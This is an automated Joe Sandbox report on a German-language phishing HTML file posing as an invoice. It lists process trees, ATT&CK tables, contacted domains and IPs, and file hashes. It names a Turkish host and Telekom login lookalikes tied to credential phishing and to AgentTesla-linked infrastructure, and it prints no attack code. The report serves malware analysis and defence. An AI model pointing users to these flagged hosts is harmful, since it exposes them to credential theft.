Windows
Analysis Report
RECHNUNG_Lieferschein_001927.htm
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
chrome.exe (PID: 4840 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "C:\Us ers\user\D esktop\REC HNUNG_Lief erschein_0 01927.htm" MD5: E81F54E6C1129887AEA47E7D092680BF) chrome.exe (PID: 5328 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --no-pre-r ead-main-d ll --field -trial-han dle=2068,i ,180257247 2403873112 7,13451297 6560203955 20,262144 --variatio ns-seed-ve rsion --mo jo-platfor m-channel- handle=205 6 /prefetc h:3 MD5: E81F54E6C1129887AEA47E7D092680BF) chrome.exe (PID: 7040 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= on_device_ model.mojo m.OnDevice ModelServi ce --lang= en-US --se rvice-sand box-type=o n_device_m odel_execu tion --no- pre-read-m ain-dll -- field-tria l-handle=2 068,i,1802 5724724038 731127,134 5129765602 0395520,26 2144 --var iations-se ed-version --mojo-pl atform-cha nnel-handl e=1460 /pr efetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
- cleanup
Click to jump to signature section
Phishing |
---|
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | Tab title: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
System Summary |
---|
Source: | Initial sample: |
Source: | File created: | Jump to behavior |
Source: | File deleted: | Jump to behavior |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | HTTP Parser: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Path Interception | 1 Process Injection | 11 Masquerading | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
beacons3.gvt2.com | 172.217.16.195 | true | false | high | |
beacons-handoff.gcp.gvt2.com | 216.58.206.35 | true | false | high | |
cdn.tailwindcss.com | 172.67.41.16 | true | false | high | |
maxcdn.bootstrapcdn.com | 104.18.11.207 | true | false | high | |
beacons2.gvt2.com | 172.217.19.99 | true | false | high | |
login.production.p5x.telekom.net | 80.146.236.47 | true | false | unknown | |
beacons.gvt2.com | 142.251.143.35 | true | false | high | |
code.jquery.com | 151.101.194.137 | true | false | high | |
cdnjs.cloudflare.com | 104.17.25.14 | true | false | high | |
www.google.com | 142.250.185.68 | true | false | high | |
beacons4.gvt2.com | 216.239.32.116 | true | false | high | |
said.yasarmuhendislik.com.tr | 46.31.79.76 | true | false | unknown | |
email.t-online.de | 62.153.158.211 | true | false | high | |
beacons.gcp.gvt2.com | unknown | unknown | false | high | |
accounts.login.idm.telekom.com | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false |
| unknown | |
false | high | ||
false | high | ||
false | high | ||
false | high | ||
true |
| unknown | |
false | high | ||
false | high | ||
false | high | ||
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
142.250.185.68 | www.google.com | United States | 15169 | GOOGLEUS | false | |
172.67.41.16 | cdn.tailwindcss.com | United States | 13335 | CLOUDFLARENETUS | false | |
46.31.79.76 | said.yasarmuhendislik.com.tr | Turkey | 207326 | HOSTLABTR | false | |
62.153.158.211 | email.t-online.de | Germany | 3320 | DTAGInternetserviceprovideroperationsDE | false | |
142.251.116.94 | unknown | United States | 15169 | GOOGLEUS | false | |
104.18.11.207 | maxcdn.bootstrapcdn.com | United States | 13335 | CLOUDFLARENETUS | false | |
80.146.236.47 | login.production.p5x.telekom.net | Germany | 3320 | DTAGInternetserviceprovideroperationsDE | false | |
151.101.194.137 | code.jquery.com | United States | 54113 | FASTLYUS | false | |
104.17.25.14 | cdnjs.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false |
IP |
---|
192.168.2.6 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1633675 |
Start date and time: | 2025-03-10 13:55:09 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultwindowshtmlcookbook.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 18 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | RECHNUNG_Lieferschein_001927.htm |
Detection: | MAL |
Classification: | mal60.phis.winHTM@41/21@66/10 |
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 142.250.184.227, 142.250.185.142, 142.250.186.142, 142.250.110.84, 142.250.185.206, 216.58.212.174, 142.250.185.138, 142.250.186.78, 216.58.206.46, 216.58.206.74, 142.250.186.74, 142.250.181.234, 142.250.186.138, 142.250.184.234, 172.217.16.202, 142.250.185.234, 142.250.185.106, 216.58.206.42, 142.250.185.170, 142.250.184.202, 142.250.186.170, 142.250.185.202, 142.250.186.42, 142.250.186.106, 2.16.100.168, 142.250.74.206, 172.217.18.14, 142.250.185.110, 172.217.16.206, 172.217.16.142, 142.250.185.67, 142.250.186.174, 172.217.23.110, 142.250.185.163, 142.250.185.174, 142.250.185.238, 23.60.203.209, 52.149.20.212
- Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog, optimizationguide-pa.googleapis.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenFile calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.18.11.207 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
172.67.41.16 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | Unknown | Browse | |||
46.31.79.76 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | DarkCloud | Browse | |||
Get hash | malicious | DarkCloud | Browse | |||
Get hash | malicious | DarkCloud | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
cdn.tailwindcss.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
beacons3.gvt2.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
maxcdn.bootstrapcdn.com | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
beacons-handoff.gcp.gvt2.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | KnowBe4 | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
HOSTLABTR | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | DarkCloud | Browse |
| ||
Get hash | malicious | DarkCloud | Browse |
| ||
Get hash | malicious | DarkCloud | Browse |
| ||
Get hash | malicious | DarkCloud | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
DTAGInternetserviceprovideroperationsDE | Get hash | malicious | Mirai, Moobot | Browse |
| |
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | KnowBe4 | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
|
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 46 |
Entropy (8bit): | 3.2849687981892175 |
Encrypted: | false |
SSDEEP: | 3:CUkwltxlHhT:PT |
MD5: | CC114ADD1D7D1AF2ACD8BA671C9B7B03 |
SHA1: | 1C96ED6597E58F0137BE85708BD5C344DA60DE9F |
SHA-256: | 8C9C9A4F5BD3716838A4A9E6C73E0833CDD1382D16C1C0C2BAE6F4EC4D6864CC |
SHA-512: | 70F810FCD4E001D4B8D470EB5B34654B1388EA4E660684EA26D15A160EA755EE36852FD7FA8E2571DA7FA5E34CAA7AC8914E73CB0B6B59B1263D9690F683CEEE |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 13529 |
Entropy (8bit): | 7.981473427014176 |
Encrypted: | false |
SSDEEP: | 384:WNmROHjlvBUz6cyeYP5c0BZE/fLtZO4ZTyKBvag:umROHrteYvZA798g |
MD5: | 3EEFFD5E7F96EE19160EE0825AE7125A |
SHA1: | 972607DACBF55571A329CC15151D8D62BC95CA42 |
SHA-256: | 6F15987DCBA055366BF7ECEC02A42949E326C4548F11DA42124F58A22FFCF0E6 |
SHA-512: | 39EEF3197AA3AF7CB3D9613117660988B43D612F3A802D5A53938A9504CE2FB321ADE6941B57D9577CB97B7A0746FE35D77E513E92282B389DB74F9F5E892BC6 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
URL: | https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 69597 |
Entropy (8bit): | 5.369216080582935 |
Encrypted: | false |
SSDEEP: | 1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT |
MD5: | 5F48FC77CAC90C4778FA24EC9C57F37D |
SHA1: | 9E89D1515BC4C371B86F4CB1002FD8E377C1829F |
SHA-256: | 9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398 |
SHA-512: | CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269 |
Malicious: | false |
Reputation: | high, very likely benign file |
URL: | https://code.jquery.com/jquery-3.2.1.slim.min.js |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7769 |
Entropy (8bit): | 7.866696840399522 |
Encrypted: | false |
SSDEEP: | 96:EvhY24qvLyIGS0EOKzMiBvwGw0jce0QFzw9EVwxmPQvv437gS4u0RdODVG5q3ca:EvhwjEOhUwGzcP9uQ437gA0Rgnca |
MD5: | D3F8BC7AC4ECF30CA4758B5C62019FF1 |
SHA1: | 6DFF5E9F830837ED1096A57A78A48DF556817375 |
SHA-256: | 6F33FF6C416C63D45FA7B99131422EE4A1124ED5CF1B409B1AE73003D5712A03 |
SHA-512: | 5A8774C5FF17835E14A6AC9F6BB5C5A12F482FB20C8A49D43B2ABFE0EAC6C6B8967632B48AF39A1B3D18A20C070FE5524FC056896098000BB22273C92CD071A2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 7769 |
Entropy (8bit): | 7.866696840399522 |
Encrypted: | false |
SSDEEP: | 96:EvhY24qvLyIGS0EOKzMiBvwGw0jce0QFzw9EVwxmPQvv437gS4u0RdODVG5q3ca:EvhwjEOhUwGzcP9uQ437gA0Rgnca |
MD5: | D3F8BC7AC4ECF30CA4758B5C62019FF1 |
SHA1: | 6DFF5E9F830837ED1096A57A78A48DF556817375 |
SHA-256: | 6F33FF6C416C63D45FA7B99131422EE4A1124ED5CF1B409B1AE73003D5712A03 |
SHA-512: | 5A8774C5FF17835E14A6AC9F6BB5C5A12F482FB20C8A49D43B2ABFE0EAC6C6B8967632B48AF39A1B3D18A20C070FE5524FC056896098000BB22273C92CD071A2 |
Malicious: | false |
URL: | https://email.t-online.de//resources/linkmail/intro_stage.gif |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 3717 |
Entropy (8bit): | 7.697434923254535 |
Encrypted: | false |
SSDEEP: | 48:HnpqTeRTvfh/aIkW3qQNn2xY21O1BJ351se1/L87mpkDzML9TIibc+ESlbFCHavq:HnpqTITvIIkWaY2+HhoML9TvoGFd9g |
MD5: | D88079CBD736B1A864C3DA54C733C97A |
SHA1: | E1951E9AEA87AAE9113FE84191A03E8DB5373001 |
SHA-256: | 2D8C67A8382B486843947C5654B8E6B84429A522D8A16611BBD64651FA11A865 |
SHA-512: | CDB6C2D57C6F7EF0821D3A908D21A19A4A78CAE6FDEABD22D4441B8738801963C4202D64D8D2FE467742C024DCFE338159D848B7FE590376DB3529DE862FBF7E |
Malicious: | false |
URL: | https://email.t-online.de//resources/linkmail/erleben_was_verbindet_DE.gif |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 19188 |
Entropy (8bit): | 5.212814407014048 |
Encrypted: | false |
SSDEEP: | 384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f |
MD5: | 70D3FDA195602FE8B75E0097EED74DDE |
SHA1: | C3B977AA4B8DFB69D651E07015031D385DED964B |
SHA-256: | A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66 |
SHA-512: | 51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14 |
Malicious: | false |
URL: | https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 46 |
Entropy (8bit): | 3.2849687981892175 |
Encrypted: | false |
SSDEEP: | 3:CUkwltxlHhT:PT |
MD5: | CC114ADD1D7D1AF2ACD8BA671C9B7B03 |
SHA1: | 1C96ED6597E58F0137BE85708BD5C344DA60DE9F |
SHA-256: | 8C9C9A4F5BD3716838A4A9E6C73E0833CDD1382D16C1C0C2BAE6F4EC4D6864CC |
SHA-512: | 70F810FCD4E001D4B8D470EB5B34654B1388EA4E660684EA26D15A160EA755EE36852FD7FA8E2571DA7FA5E34CAA7AC8914E73CB0B6B59B1263D9690F683CEEE |
Malicious: | false |
URL: | https://email.t-online.de//resources/linkmail/spacer.gif |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 127227 |
Entropy (8bit): | 7.998212773095205 |
Encrypted: | true |
SSDEEP: | 1536:dYv6qu10A2T+iYQRCCWd02s4mld1zl62DX7rrr8EeuRom6pNysr6o212aqJXc2Tr:d+6V09RCxddl2zUEZodPGo/aKsDdEZ |
MD5: | AB9ECC5F6C8AF4DCACD7AB9AC9CBC104 |
SHA1: | 103A8BC4733A69C6C4CDE41FC81C7DC454DCC7C9 |
SHA-256: | AF4834F08A5331800BF4336CDF4CA8BB2364D3D5BE0FD29833329734F9B9B784 |
SHA-512: | DCC5D38EFDC3DCA11F24ABF01FC7778FE6C5E21630A10C594632F4072FB7098C7D5A5EA7BCB208DA40839DDEB582860D75B0F89D73AA7A9D7F1252B64D5A5158 |
Malicious: | false |
URL: | https://cdn.tailwindcss.com/3.4.16 |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3717 |
Entropy (8bit): | 7.697434923254535 |
Encrypted: | false |
SSDEEP: | 48:HnpqTeRTvfh/aIkW3qQNn2xY21O1BJ351se1/L87mpkDzML9TIibc+ESlbFCHavq:HnpqTITvIIkWaY2+HhoML9TvoGFd9g |
MD5: | D88079CBD736B1A864C3DA54C733C97A |
SHA1: | E1951E9AEA87AAE9113FE84191A03E8DB5373001 |
SHA-256: | 2D8C67A8382B486843947C5654B8E6B84429A522D8A16611BBD64651FA11A865 |
